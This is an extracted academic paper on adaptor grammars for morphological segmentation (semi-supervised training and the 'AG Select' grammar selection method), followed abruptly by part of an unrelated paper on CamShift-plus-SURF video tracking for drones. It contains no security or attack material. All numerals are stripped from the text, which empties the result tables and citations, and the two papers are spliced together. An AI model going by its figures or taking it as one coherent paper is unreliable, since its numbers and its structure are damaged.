concept than an attempt to achieve state-of-the-art results (johnson et al., ; johnson, b). using ags for learning morphology originally, the ag framework was designed for un- supervised learning. this section first describes how ags can be used for unsupervised morphological segmentation, and then introduces two ways to use a small labelled data set to improve performance: semi-supervised learning and grammar selection. . unsupervised adaptor grammars we define three ag models to use as unsupervised baselines in our segmentation experiments. the first of these is very simple: word → morph+ morph → char+ ( ) the underline notation indicates an adapted non- terminal, and + abbreviates a set of recursive rules, e.g., word → morph+ is short for word → morphs morphs → morph morphs morphs → morph grammar (morphseq) is just a unigram model over morphs: the morph symbol is adapted, so the probability of each morph will be roughly propor- tional to its (inferred) frequency in the corpus. the grammar specifies no further structural relationships between morphs or inside of morphs (other than a geometric distribution on their length in characters). experiments with ags for unsupervised word seg- mentation suggest that adding further latent structure can help with learning. here, we add another layer of structure below the morphs, calling the resulting because the nonterminal labels are arbitrary, this grammar can also be interpreted as adding another layer on top of morphs, allowing the model to learn morph collocations that encode de- pendencies between morphs (which themselves have no substruc- ture). however preliminary experiments showed that the morph- submorph interpretation scored better than the collocation-morph interpretation, hence we chose the corresponding nonterminal names. grammar submorphs: word → morph+ morph → submorph+ submorph → char+ ( ) for capturing the rules of morphotactics, a gram- mar with linguistically motivated non-terminals can be created. there are many plausible options and the best-performing grammar may be somewhat language-dependent. rather than experimenting ex- tensively, we designed our third grammar to replicate as closely as possible the grammar that is implicitly implemented in the morfessor system. this com- pounding grammar distinguishes between prefixes, stems and suffixes, allows compounding, defines the order in which the morphs can occur and also allows the morphs to have inner latent structure: word → compound+ compound → prefix∗ stem suffix∗ prefix → submorph+ stem → submorph+ suffix → submorph+ submorph → char+ ( ) . semi-supervised adaptor grammars the first new use of ags we introduce is the semi- supervised ag, where we use the labelled data to ex- tract counts of the different rules and subtrees used in the gold-standard analyses. we then run the mcmc sampler as usual over both the unlabelled and la- belled data, treating the counts from the labelled data as fixed. we assume that the labelled data provides a con- sistent bracketing (no two spans in the bracketing can partially overlap) and the labels of the spans must be compatible with the grammar. however, the bracketing may not specify all levels of structure in the grammar. in our case, we have morpheme bracketings but not, e.g., submorphs. thus, using the submorphs grammar in semi-supervised mode will constrain the sampler so that morph spans in the labelled data will remain fixed, while the submorphs inside those morphs will be resampled. the main change made to the ag inference pro- cess for implementing the semi-supervised ag was to prune out from the sampling distribution any non- terminals that are inconsistent with the spans/labels in the given labelling. . ag select both the unsupervised and semi-supervised methods described above assume the definition of a grammar that adequately captures the phenomena being mod- elled. although the ag framework makes it easy to experiment with different grammars, these experi- ments can be time-consuming and require some good guesses as to what a plausible grammar might be. these problems can be overcome by automating the grammar development process to systematically eval- uate different grammars and find the best one. we propose a minimally supervised model selec- tion method ag select that uses the ag framework to automatically identify the best grammar for different languages and data sets. we first define a very gen- eral binary-branching cfg grammar for ag training that we call the metagrammar. the metagrammar learns a parse tree for each word where each branch contains a different structure in the word. the granu- larity of these structures is determined by the depth of this tree. for example, grammar generates binary trees of depth two and can learn segmentations of up to four segments. word → m word → m m m → m m → m m m → m m → m m m → chars+ m → chars+ m → chars+ m → chars+ ( ) next we introduce the notion of a morphologi- cal template, which is an ordered sequence of non- terminals whose concatenated yields constitute the word and which are used to parse out a specific seg- mentation of the word. for example, using gram- mar the parse tree of the word saltiness is shown in figure . there are four possible templates with four we started with mark johnson’s pyag implementa- tion, http://web.science.mq.edu.au/∼mjohnson/code/py-cfg.tgz, which we also used for our unsupervised and grammar selection experiments. word m m s a l m t m m i m n e s s figure : the parse tree generated by the metagrammar of depth for the word saltiness. different segmentations: m m (salt iness), m m m (sal t iness), m m m (salt i ness), and m m m m (sal t i ness). the morphological template consisting only of non-terminals from the lowest cached level of the parse tree is expected to have high recall, whereas the template containing the non-terminals just below the word is expected to have high precision. our goal is to find the optimal template by using a small labelled data set. the grammar selection process iter- ates over the set of all templates. for each template, the segmentations of the words in the labelled data set are parsed out and the value of the desired evalua- tion metric is computed. the template that obtained the highest score is then chosen. for each language we use a single template to seg- ment all the words in that language. however, even using (say) a four-morph template such as m m m m , some words may contain fewer morphs because the metagrammar permits either unary or binary branching rules, so some parses may not con- tain m or m (and thus m m ) spans. thus, we can represent segmentations of different lengths (from to n, where n is the depth of the metagram- mar) with a single template. for our experiments we use a metagrammar of depth four. this grammar allows words to consist of up to segments, which we felt would be enough for any word in the training data. also, iterating over all the templates of a grammar with bigger depth would not be feasible as the number of different templates increases very rapidly. we also experimented with selecting different templates for words of different length but observed no improvements over the single template approach. the number of templates of each depth can be expressed recursively as ni = (ni− + ) , where ni− is the number of . inductive learning previous work on ags has used relatively small data sets and run the sampler on the entire input corpus (some or all of which is also used for evaluation)—a transductive learning scenario. however, our larger data sets contain millions of word types, where sam- pling over the whole set is not feasible. for example, training iterations on k word types took about a week on one . ghz cpu. to solve this problem, we need an inductive learner that can be trained on a small set of data and then used to segment a different larger set. to create such a learner, we run the sampler on up to k word types, and then extract the posterior grammar as a pcfg. this grammar contains all the initial cfg rules, plus rules to generate each of the cached subtrees inferred by the sampler. the sampler counts of all rules are normalized to obtain a pcfg, and we can then use a standard cky parser to decode the remaining data using this pcfg. experiments . data we test on languages with a range of morphologi- cal complexity: english, finnish, turkish, german, and estonian. for each language we use two small sets of gold-annotated data—a labelled set for semi- supervised training or model selection and a dev set for development results—and one larger gold- annotated dataset for final tests. we also have a large unlabelled training set for each language. table gives statistics. the data sets for english, finnish, turkish and german are from the morpho challenge com- petition (mc ). we use the mc training set of annotated word types as our labelled data, and for our dev sets we collate together the devel- opment data from all years of the mc competition. final evaluation is done on the official mc test sets, which are not public, so we rely on the mc organizers to perform the evaluation. the words in templates in the grammar of depth one less and n = . this can be seen as a form of structure compilation (liang et al., ), where the solution found by a more costly model is used to define a less costly model. however in liang et al.’s case both models were already inductive. http://research.ics.aalto.fi/events/morphochallenge / datasets.shtml unlab. lab. dev test english . m k finnish . m k turkish . m k german . m k estonian . m k table : number of word types in our data sets. each test set are an unknown subset of the words in the unlabelled corpus, so to evaluate we segmented the entire unlabelled corpus and sent the results to the mc team, who then computed scores on the test words. the estonian wordlist is gathered from the news- paper texts of a mixed corpus of estonian. gold standard segmentations of some of these words are available from the estonian morphologically disam- biguated corpus; we used these for the test set, with small subsets selected randomly for the labelled and dev sets. for semi-supervised tests of the ag compounding grammar we annotated the morphemes in the english, finnish and estonian labelled sets as prefixes, stems or suffixes. we could not do so for turkish because none of the authors knows turkish. . evaluation we evaluate our results with two measures: segment border f -score (sbf ) and emma (spiegler and monson, ). sbf is one of the simplest and most popular evaluation metrics for morphological segmentations. it computes f -score from the preci- sion and recall of ambiguous segment boundaries— i.e., word edges are not counted. it is easy and quick to compute but has the drawback that it gives no credit for one-morpheme words that have been seg- mented correctly (i.e., are assigned no segment bor- ders). also it can only be used on systems and gold standards where the output is just a segmentation of the surface string (e.g., availabil+ity) rather than a morpheme analysis (e.g., available+ity). for this reason we cannot report sbf on our german data, which annotations contain only analyses. emma is a newer measure that addresses both http://www.cl.ut.ee/korpused/segakorpus/epl http://www.cl.ut.ee/korpused/morfkorpus/ of these issues—correctly segmented one-morpheme words are reflected in the score, and it can evalu- ate both concatenative and non-concatenative mor- phology. emma works by finding the best one-to- one mapping between the hypothesized and true seg- ments. the induced segments are then replaced with their mappings and based on that, f -score on match- ing segments is calculated. using emma we can evaluate the induced segmentations of german words against gold standard analyses. emma has a freely available implementation, but is slow to compute because it uses integer linear programming. for our dev results, we computed both scores us- ing the entire dev set, but for the large test sets, the evaluation is done on batches of word types se- lected randomly from the test set. this procedure is repeated times and the average is reported, just as in the mc competition (kohonen et al., a). . baseline models we compare our ag models to several other mor- phology learning systems. we were able to obtain implementations of two of the best unsupervised sys- tems from mc , morfessor (creutz and lagus, ) and morsel (lignos, ), and we use these for comparisons on both the dev and test sets. we also report test results from mc for the only semi-supervised system in the competition, semi- supervised morfessor (kohonen et al., a; ko- honen et al., b). no dev results are reported on this system since we were unable to obtain an imple- mentation. this section briefly reviews the systems. . . morfessor categories-map morfessor categories-map (morfessor) is a state- of-the-art unsupervised morphology learning system. its implementation is freely available so it is widely used both as a preprocessing step in tasks requiring morphological segmentations, and as a baseline for evaluating morphology learning systems. morfessor uses the minimum description length (mdl) principle to choose the optimal segment lexi- con and the corpus segmentation. each morph in the segment lexicon is labelled as a stem, prefix, suffix http://www.cs.bris.ac.uk/research/machinelearning/ morphology/resources.jsp#eval http://www.cis.hut.fi/projects/morpho/ morfessorcatmapdownloadform.shtml or non-morph. the morphotactic rules are encoded as an hmm, which specifies the allowed morph se- quences with respect to the labels (e.g., a suffix can- not directly follow a prefix). the morphs in the segment lexicon can have a hierachical structure, containing submorphs which themselves can consist of submorphs etc. we hypoth- esize that this hierarchical structure is one of the key reasons why morfessor has been so successful, as the experiments also in this paper with different gram- mars show that the ability to learn latent structures is crucial for learning good segmentations. one essential difference between morfessor and the proposed ag select is that while we use the la- belled data to choose which levels of the hierarchy are to be used as morphs, morfessor makes this de- cision based on the labels of the segments, choosing the most fine-grained morph sequence that does not contain the non-morph label. morfessor includes a free parameter, perplexity threshold, which we found can affect the sbf score considerably ( points or more). the best value for this parameter depends on the size of the training set, characteristics of the language being learned, and also the evaluation metric being used, as in some cases the best sbf and emma scores are obtained with completely different values. thus, we tuned the value of the perplexity thresh- old on the labelled set for each language and evalua- tion metric for different unlabelled training set sizes. . . semi-supervised morfessor recently, the morfessor system has been adapted to allow semi-supervised training. four versions of the system were evaluated in mc , using differ- ent degrees of supervision. results reported here are from the morfessor s+w system, which performed best of those that use the same kind of labelled data as we do. this system uses the morfessor base- line model (not cat-map), which incorporates a lexicon prior and data likelihood term. the semi- supervised version maintains separate likelihoods for the labelled and unlabelled data, and uses the devel- opment set to tune two parameters that weight these terms with respect to each other and the prior. morfessor s+w+l performs better, but uses training data with morpheme analyses rather than surface segmentations. . . morsel morsel (lignos, ) is an unsupervised mor- phology learning system introduced in mc ; we obtained the implementation from the author. morsel learns morphological analyses rather than segmenta- tions, so it can be evaluated only using emma. there are two options provided for running morsel: aggres- sive and conservative. we used the development set to choose the best in each experimental case. the mc data sets contain gold standard morpho- logical analyses (as well as segmentations) so we could compute morsel’s emma scores using the analyses. however, we found that morsel obtains higher emma scores when evaluated against gold standard segmentations and thus we used this option in all the experiments. (emma scores for other sys- tems were also computed using the segmentations.) . method the experiments were conducted in two parts. first, we evaluated different aspects of the ag models and compared to all baseline models using the dev set data. then we evaluated the most competitive models on the final test data. for the development experiments, we compiled un- labelled training sets with sizes ranging from k to k word types (using the most frequent word types in each case). for the ag results, we report the aver- age of five different runs made on the same training set. we let the sampler run for iterations. no annealing was used as it did not seem to help. the table label resampling option was turned on and the hyperparameter values were inferred. we trained all ag and baseline models on each of these training sets. for ag select, the words from the labelled data set were added to the training set to allow for template selection. to compute results in transductive mode, the words from the dev set were also added to the training data. in inductive mode, the dev set was instead parsed with the cky parser. preliminary experiments showed that the perfor- mance of unsupervised ag and ag select improved with larger training sets, though the effect is small (see figure for results of ag select in transductive we also experimented with smaller sets of labelled data. in most cases, the template selected based on only word types was the same than the one selected with word types. mode; the trend in inductive mode is similar). based on these and similar results with other baseline sys- tems, all results reported later for unsupervised mod- els (ag and baseline) and ag select were obtained using training sets of k words. in contrast to the above models, the semi- supervised ag does not always improve with more unlabelled data (see figure ) and in the limit, it will match the performance of the same grammar in the unsupervised setting. other semi-supervised approaches often solve this problem by weighting the labelled data more heavily than the unlabelled data when estimating model parameters—effectively, assuming that each labelled item has actually been observed more than once. however, duplicating the labelled data does not make sense in the ag frame- work, because duplicate items will in most cases just be cached at the root (word) node, providing no addi- tional counts of morphs (which are where the useful information is). it might be possible to come up with a different way to weight the labelled data more heav- ily when larger unlabelled sets are used, however for this paper we instead kept the labelled data the same and tuned the amount of unlabelled data. we used the dev set to choose the amount of unlabelled data (in the range from k to k types); results for semi-supervised ag are reported using the optimal amount of unlabelled data for each experiment. for test set experiments with semi-supervised ag, we evaluated each language using whichever gram- mar performed best on that language’s dev set. for test set experiments with ag select, we chose the templates with a two-pass procedure. first, we trained samplers on the k training set with la- belled set added, and used the labelled data to choose the best template for each inferred grammar. then, we decoded the dev set using each of the gram- mar/template pairs and based on these results, chose the best of these pairs to decode the test set. . results we present the dev set results in table (a) for trans- ductive and in table (b) for inductive learning. in each table, unsupervised models are shown in the upper section and the semi-supervised models and ag select below. morsel appears only in table (a) since it only works transductively. semi-supervised grammars cannot be trained on german, since we f -s c o re # of word types english estonian finnish turkish f -s c o re # of word types english estonian finnish turkish figure : effect of training data size on dev set sbf for ag select (left) and semi-supervised submorphs grammar (right) in transductive mode. only have gold standard analyses, not segmentations. the submorphs grammar performs the best of the unsupervised ag models, with the compounding grammar being only slightly worse. we also tried the compounding grammar without the sub-morph structures but the results were even worse than those of morphseq. this shows that the latent structures are important for learning good segmentations. in all cases, the semi-supervised ags perform bet- ter (ofen much better) than the corresponding unsu- pervised grammars. even though their average scores are not as high as ag select’s, they give the best dev set results in many cases. this shows that although for semi-supervised ag the grammar must be cho- sen manually, with a suitable choice of the grammar and only a small set of labelled data it can improve considerably over unsupervised ag. in transductive mode, the ag select performs the best in several cases. in both transductive and induc- tive mode, the results of ag select are close to the best results obtained and are consistently good across all languages—it achieves the best average scores of all models, suggesting that the model selection method is robust to different types of morphology and annotation schemes. table presents the test set results. we include scores for unsupervised morfessor in both transduc- tive and inductive mode, where transductive mode trains on the entire unlabelled corpus and inductive mode trains on the k subset. the semi-supervised morfessor scores are taken from the mc results page after verifying that the evaluation method- http://research.ics.aalto.fi/events/morphochallenge/ ology and labelled data used is the same as ours. there is a good deal of variation between devel- opment and test results, indicating that the dev sets may not be a representative sample. the most no- table differences are in turkish, where all models perform far worse on the test than dev set. however, ag select performs slightly better on the test set for the other languages. thus its average sbf score ac- tually improves on the test set and is not much worse than semi-supervised morfessor. while its average performance drops somewhat on test set emma, it is still as good as any other model on that measure. again, these results support the idea that ag select is robust to variations in language and data set. we also note the surprisingly good performance of morfessor in transductive mode on estonian; this could possibly be due to the larger amount of training data used for the test set results, but it is not clear why this would improve performance so much on estonian and not on the other languages. discussion to give a sense of what the ag select model is learn- ing, we provide some examples of both correctly and incorrectly induced segmentations in table . these examples suggest that for example in english, m is used to model the stem, m is for the suffix or the second stem in the compound word, and the rest of the elements in the template are for the remaining suffixes (if any). table presents examples of some of the most frequently used metagrammar rules and cached rules sami virpioja, personal communication. (a) transductive mode border f -score emma eng est fin tur avg eng est fin tur ger avg ag morphseq . . . . . . . . . . . ag submorphs . . . . . . . . . . . ag compounding . . . . . . . . . . . morfessor . . . . . . . . . . . morsel - - - - - . . . . . . ag ssv morphseq . . . . . . . . . - - ag ssv submorphs . . . . . . . . . - - ag ssv compounding . . . - - . . . - - - ag select . . . . . . . . . . . (b) inductive mode border f -score emma eng est fin tur avg eng est fin tur ger avg ag morphseq . . . . . . . . . . . ag submorphs . . . . . . . . . . . ag compounding . . . . . . . . . . . morfessor . . . . . . . . . . . ag ssv morphseq . . . . . . . . . - - ag ssv submorphs . . . . . . . . . - - ag ssv compounding . . . - - . . . - - - ag select . . . . . . . . . . . table : dev set results for all models in (a) transductive and (b) inductive mode. unsupervised ag models and baselines are shown in the top part of each table; semi-supervised ag models and grammar selection method are below. border f -score emma eng est fin tur avg -est eng est fin tur ger avg -est/ger morf. trans . . . . . . . . . . . . . morf. ind . . . . . . . . . . . . . morsel - - - - - - . . . . . . . morf. ssv . - . . - . . - . . - - . ag ssv best . ? . † . ? . ∗ . . . ? . † . ? . ∗ - - . ag select . . . . . . . . . . . . . table : test set results for unsupervised baselines morfessor catmap (in transductive and inductive mode) and morsel; semi-supervised morfessor; and ag semi-supervised (? marks the compounding grammar, † denotes submorphs grammar, and ∗ is the morphseq grammar) and grammar selection methods. results are shown for each language, averaged over all languages (when possible: avg), and averaged over just the languages where scores are available for all systems (-est, -est/ger). for english, together with their relative frequencies. it shows that at the word level the binary rule is selected over three times more frequently than the unary rule. also, most of the more frequently used grammar rules expand the first branch (rooted in m ) into more finegrained structures. the second branch (m ) is mostly modelled with the unary rule. among the frequently cached rules we see the common english prefixes and suffixes. one of the most frequent cached rule stores the single letter e at the end of a word, which often causes oversegmen- tation of words ending in e (as seen in the incorrect examples in table ). this problem is common in unsupervised morphological segmentation of english (goldwater et al., ; goldsmith, ). we also took a look at the most frequent cached rules learned by the semi-supervised ag with the submorphs grammar, and observed that morphs correct segmentations incorrect segmentations word segmentation induced correct treatable [tr.ea.t]m [a.b.le]m disagree s dis agree s disciplined [dis.cip.l.i.n]m [e.d]m reduc e reduce monogamous [mon.o.g.a.m]m [o.u.s]m revalu e re value streakers [st.r.e.a.k]m [e.r]m [s]m derid e deride tollgate [t.o.l.l.]m [g.a.t.e]m [s]m accompani ed ac compani ed foxhunting [f.o.x]m [h.u.n.t]m [ing]m war y wary muscovites [m.u.sc.o.v]m [i.t.e]m [s]m indescrib able in describ able standardizes [st.a.n.d.a.rd]m [i.z.e]m [s]m orat es orate s slavers’ [sl.a.v]m [e.r]m [s]m [’]m alger ian s algeri an s earthiness’ [e.ar.th]m [i]m [ness]m [’]m disput e s dispute s instinkt [in.st.in.kt]m meister likkust meisterlikkus t rebis [re.b.i]m [s]m min a mina toitsid [to.it]m [s.id]m teiste teis te armuavaldus [a.rm.u]m [ava.ld.u.s]m kuritegu de sse kuri tegu desse määgivale [mää.g.i]m [v.a]m [l.e]m liharoa ga liha roa ga keskuskoulussa [kesk.us]m [koul.u]m [s.sa]m polte tti in polte tt i in peruslähteille [per.u.s]m [l.ä.ht.e]m [i]m [ll.e]m kulttuuri se lt a kin kulttuurise lta kin perunakaupoista [per.u.n.a]m [k.au.p.o]m [i]m [st.a]m tuote palki ntoja tuote palkinto j a yöpaikkaani [yö]m [p.ai.kk.a]m [a]m [n.i]m veli puo lt a veli puol ta nimettäköön [ni.m.e]m [tt.ä]m [k.ö]m [ö.n]m ota ttava otatta va table : examples of segmented words in english (top), estonian (middle) and finnish (bottom). correctly segmented words are in the left part of the table. the identified segments are in brackets indexed by the respective template nonterminal; dots separate the metagrammar generated parse tree leaves. examples of incorrectly segmented words together with the correct segmentation are on the right. freq (%) rule freq (%) cached rule . word → m m . (m (m (m (m s))))) . m → m m . (m (m (m (m e)) (m (m d)))) . word → m . (m (m (m (m i)) (m (m n g)))) . m → m . (m (m (m (m e))) . m → m . (m (m (m (m ’))) (m (m (m s)))) . m → m m . (m a) . m → m m . (m (m (m (m y)))) . m → m . (m (m (m (m e))) (m (m r))) . m → m m . (m (m (m (m a)))) table : examples from english most frequently used metagrammar rules and cached rules together with their relative occurrence frequencies (in percentages). tended to contain only a single submorph. this helps to explain why the submorphs grammar in semi-supervised ag improved less over the unsuper- vised ag as compared to the morphseq grammar— the rules with only a single submorph under the morph are essentially the same as they would be in the morphseq grammar. finally, we examined the consistency of the tem- plates chosen for each of the samplers during model selection for the test set (section . ). we found that there was some variability in the templates, but in most experiments the same template was chosen for the majority of the samplers (see table ). while this majority template is not always the optimal one on the dev set, we observed that it does produce con- sistently good results. it is possible that using the majority template, rather than the optimal template for the dev set, would actually produce better results majority template english m m m m m finnish m m m m m turkish m m m m m german m m m m m m estonian m m m table : majority templates for each language. note that the estonian gold standard contains less fine-grained segmentations than some of the other languages. on the test set, especially if (as appears to be the case here, and may often be the case in real applications) the dev and test sets are from somewhat different distributions. it must be noted that both ag select and semi- supervised ag are computationally more demanding than the comparison systems. since we do inference over tree structures, the complexity is cubic in the input word length, while most segmentation systems are quadratic or linear. even compared to the unsu- pervised ag, ag select is more expensive, because of the larger grammar and number of cached symbols. nevertheless, our systems can feasibly be run on the large morpho challenge datasets. other recent unsupervised systems have reported state-of-the art results by incorporating additional in- formation from surrounding words (lee et al., ), multilingual alignments (snyder and barzilay, ), or overlapping context features in a log-linear model (poon et al., ), but they have only been run on semitic languages and english (and in the latter case, a very small corpus). since they explicitly enumerate and sample from all possible segmentations of each word (often with some heuristic constraints), they could have trouble with the much longer words of the agglutinative languages tested here. in any case the results are not directly comparable to ours. conclusion in this paper we have introduced three new meth- ods for adaptor grammars and demonstrated their usefulness for minimally supervised morphological segmentation. first, we showed that ag models can be scaled to large data sets by using the posterior grammar for defining an inductive model, that on average results in the same accuracy as compared to full transductive training. second, we implemented semi-supervised ag in- ference, which uses labelled data to constrain the sampler, and showed that in all cases it performs much better than the unsupervised ag on the same grammar. semi-supervised ag could benefit from labelled data reweighting techniques frequently used in semi-supervised learning, and studying the proper ways of doing so within the ag framework would be a potential topic for future research. our final contribution is the ag select method, where the initial model is trained using a very general grammar that oversegments the data, and the labelled data is used to select which granularity of segments to use. unlike other morphological segmentation mod- els, this method can adapt its grammar to languages with different structures, rather than having to use the same grammar for every language. indeed, we found that ag select performs well across a range of languages and also seems to be less sensitive to differences between data sets (here, dev vs. test). in addition, it can be trained on either morphological analyses or segmentations. although we tuned all results to optimize the sbf metric, in principle the same method could be used to optimize other mea- sures, including extrinsic measures on downstream applications such as machine translation or informa- tion retrieval. in future we hope to show that this method can be used to improve performance on such applications, and also to explore its use for related segmentation tasks such as stemming or syllabifica- tion. also, the method itself could potentially be improved by designing a classifier to determinine the best template for each word based on a set of features, rather than using a single template for all words in the language. acknowledgments this work was supported by the tiger university pro- gram of estonian information technology founda- tion for the first author. we thank constantine lignos for releasing his morsel code to us, sami virpioja for evaluating test set results, and federico sangati for providing useful scripts. references mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions of speech and language processing, ( ): – , february. micha elsner, eugene charniak, and mark johnson. . structured generative models for unsupervised named- entity clustering. in proceedings of naacl, pages – . association for computational linguistics. john goldsmith. . unsupervised learning of the morphology of a natural language. computational lin- guistics, ( ): – , june. sharon goldwater, thomas l. griffiths, and mark john- son. . interpolating between types and tokens by estimating power-law generators. in advances in neu- ral information processing systems , pages – , cambridge, ma. mit press. eric a. hardisty, jordan boyd-graber, and philip resnik. . modeling perspective using adaptor grammars. in proceedings of emnlp, pages – . association for computational linguistics. zellig harris. . structural linguistics. university of chicago press. yun huang, min zhang, and chew lim tan. . non- parametric bayesian machine transliteration with syn- chronous adaptor grammars. in proceedings of acl: short papers - volume , pages – . association for computational linguistics. mark johnson and katherine demuth. . unsuper- vised phonemic chinese word segmentation using adap- tor grammars. in proceedings of coling, pages – . association for computational linguistics. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on un- supervised word segmentation with adaptor grammars. in proceedings of naacl, pages – . association for computational linguistics. mark johnson, thomas l. griffiths, and sharon gold- water. . adaptor grammars: a framework for specifying compositional nonparametric bayesian mod- els. in b. schölkopf, j. platt, and t. hoffman, editors, advances in neural information processing systems , pages – . mit press, cambridge, ma. mark johnson. a. unsupervised word segmentation for sesotho using adaptor grammars. in proceedings of acl special interest group on computational mor- phology and phonology, pages – . association for computational linguistics. mark johnson. b. using adaptor grammars to iden- tify synergies in the unsupervised acquisition of linguis- tic structure. in proceedings of acl, pages – . association for computational linguistics. oskar kohonen, sami virpioja, and krista lagus. a. semi-supervised learning of concatenative morphology. in proceedings of acl special interest group on com- putational morphology and phonology, pages – . association for computational linguistics. oskar kohonen, sami virpioja, laura leppänen, and krista lagus. b. semi-supervised extensions to morfessor baseline. in proceedings of the morpho challenge workshop, pages – . aalto univer- sity school of science and technology. yoong keok lee, aria haghighi, and regina barzilay. . modeling syntactic context improves morpho- logical segmentation. in proceedings of conll, pages – . association for computational linguistics. percy liang, hal daumé, iii, and dan klein. . struc- ture compilation: trading structure for features. in proceedings of icml, pages – . association for computing machinery. constantine lignos. . learning from unseen data. in mikko kurimo, sami virpioja, and ville t. turunen, editors, proceedings of the morpho challenge workshop, pages – . aalto university school of science and technology. jim pitman and marc yor. . the two-parameter poisson-dirichlet distribution derived from a stable sub- ordinator. annals of probability, ( ): – . hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proceedings of naacl, pages – . association for computational linguistics. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in proceedings of acl, pages – . associ- ation for computational linguistics. sebastian spiegler and christian monson. . emma: a novel evaluation metric for morphological analysis. in proceedings of coling, pages – . associ- ation for computational linguistics. sze-meng jojo wong, mark dras, and mark johnson. . exploring adaptor grammars for native language identification. in proceedings of emnlp, pages – . association for computational linguistics. 基于camshift的视频跟踪算法改进及实现 international journal of advanced network, monitoring and controls volume , no. , improvement and realization of camshift algorithm based motionimage tracking wang yubian* department of railway transportation control belarusian state university of transport, , kirova street, gomel, , republic of belarus *is the communication author. e-mail: alika_wang@mail.ru yuri shebzukhov department of the international relations belarusian state university of transport, republic of belarus , kirova street, gomel, , republic of belarus e-mail: oms@bsut.by abstract—the detection and tracking technology of moving object image is one of the key technologies of computer vision, and is widely used in many fields such as industry, transportation, and military. the detection and tracing of moving object in the motion scenes based on the uav platform is a technical difficulty in this field. in practical applications, the characteristics of complicated environment, small target object and moving platform require higher real-time performance and reliability of the algorithm. if it is possible to add some other features of the target to the tracking process, it will be possible to improve the shortcomings of camshift itself. based on the camshift tracking algorithm, this paper integrates surf feature detection into the algorithm, which greatly improves the tracking accuracy of the target object, and also has better real-time performance which can achieve better tracking performance of the object. keywords-motion image; camshift algorithm; surf; feature detection i. introduction video tracking is the key technology for motion target object detection in dynamic sceneson uav platform. it can be realized by two methods: one is based on target recognition technology, of which the core concept is frame-by-frame recognition algorithm for motion video to identify the target object and determine the target matching. the other is based on the detection technology of the moving object, of which the core concept is the active detection of the moving object, and the position of the moving object is determined in accordance with the detection result to realize the tracking.this method can achieve the tracking of any moving object without the need of complicated priori information for detection, such ascharacteristics of object shape, object sizes. however, the tracking effect of various tracking algorithms also depends on the background migration of the object, the unpredictable tracking path, the unpredictable target motion path and mode, the scene switch, the target object movement does not have an analyzable pattern, the change of camera model, the camera shift, and the change of illumination condition. and the causes of the changes in the color and shape of the moving object are very different [ ]. the current mainstream motion object tracking methods with good tracking performance mainly include feature-based tracking methods, region-based tracking methods, model-based tracking methods, motion estimation-based tracking methods, and contour-based tracking methods. the detection and tracking algorithm of the conventional motion object is only suitable for the scene with static or almost static background, but it is not suitable for the detection and tracking of moving objects in the uav video. therefore, the digital sequence information of the video images acquired by the drone should meet the real-time, accurate, robust and other requirements [ ]. the current research shows that the target object tracking method based on camshift algorithm can meet the requirements of drone video target tracking. the camshift algorithm performs target object recognition and tracking by analyzing the hue component doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , information of the target region in the hsv color space. the target has low deformation sensitivity. the algorithm has good real-time performance, little computationand low complexity. therefore it has been extensively studied. in the video target tracking by drone, the camshift algorithm [ ],comparing to other tracking methods, has many advantages and disadvantages. under the condition such as the similar color setting to the target object in the background or in the complicated scene, the camshift algorithm may have tracking error or fail to track because of the tracking characteristicsthat the algorithm is based on the color information of the moving object. if other auxiliary features of the object can be obtained during the search process and input conditionsof algorithm are specified, it is possible to make up for the problems caused by camshift in such scenes. because the surf algorithm has the advantage of good object recognition, the implementation of the speedup robust features (surf) in the camshift algorithm will greatly improve the tracking accuracy and the tracking reliability of the object. the improved method ensures the good real-time performance of the tracking, greatly improves the tracking accuracy of the object by uav, and eventually achieves a better tracking effect of the moving object. ii. the characteristics of surf the tracking of the characteristics of the target object isbased on the tracking of point of interest, which is often used in engineering applications and it works well. the difficulty of this method lies in the selection and extraction of features [ ]. the selection of features should be able to fully cover the key features of the target object in different scene settings, and such features shall also be convenientfor extraction. in general, if the number of sampling points is insufficient in the process of extracting features, it is easy to lose tracking of the object and the tracking effectwould deteriorate. on the contrary, the calculation amount and complexity will be greatly increased, and unableto satisfy the actual application. although the harris corner detection method is a traditional point of interest detection method, due to its fixed scale characteristics, it is becoming difficult to determine the change ofposition of the target object between image frames when the target object is deformed or there is change in dimensions. prof. david g. lowe of the university of british columbia in canada first proposed the scale invariant feature transform (sift) [ ]. the sift algorithm for querying feature key points is to use feature detection within the constructed scale. the orientational selection of point of interest is calculated according to the gradient of its neighborhood, thus achieving the goal that the feature in the scale does not change in accordance with the orientation. however, the algorithm requires high computational complexity, and has high requirements for hardware devices, and a shortcoming of poor real-time computation. on the basis of this algorithm, yan ke et al. introduced the principal components analysis(pca) in the sift system and proposed the pca-sift algorithm, which profoundly improved the matching inefficiency of the common sift algorithm. however, this method will lead to the failure of feature extraction in the later stage as well as the deterioration of the characteristic distinctiveness. on this basis, some people have proposed a point of interest algorithm based on surf [ ]. the extracted features are used as the key local features of the images. the speed of the fast calculation is improved by the integral image method. then the point of interest obtained by haar wavelet transform are used to obtain the main orientation and its feature vector [ ]. finally, the euclidean metric is calculated to verify the matching effect between the images. the surf feature is invariant in the presence of changes in brightness, translation, rotation, and scale. in addition, the method does not show any negative effect to its robustness under noise interference conditions even if the viewing angle changes. this method not only realizes theaccurate feature recognition, but also reduces the computational complexity, which greatly improves the inefficiency of the method in use, and has broad application. international journal of advanced network, monitoring and controls volume , no. , iii. the surf algorithm a. constructing hessian matrix surf relies on approximation of the determinant images of hessian matrix. the hessian matrix is the core of the surf algorithm [ ]. first, the hessian matrix of each pixel is calculated according to the equation, and then the hessian matrix discriminant is used to determine whether the point is an extremum. gaussian filtering is used to construct the gaussian pyramid [ ]. compared with the gaussian pyramid construction process of sift algorithm, the speed of surf algorithm is improved. in the surf algorithm, the image space occupancy of each set is different. the previous set of images is downsampled by / to obtain the next scale. at the same time, the same set of images has the same size, and the difference is that different scales σ are used. in addition, in the process of blurring, the gaussian template size is always constant, and only the scale changes σ. for the surf algorithm, the image size remains the same, only the gaussian blur template size and scale σ need to be changed. b. preliminary determination of point of interestusing non-maximum suppression each pixel processed by the hessian matrix is compared with its points in the three-dimensional domain. if it is the extremum of these points, it shall beselected as a preliminary point of interest for the next process [ ]. the detection process uses a filter corresponding to the size of the scale image to detect. in this paper, a × filter is used as an example for detection analysis. the point of 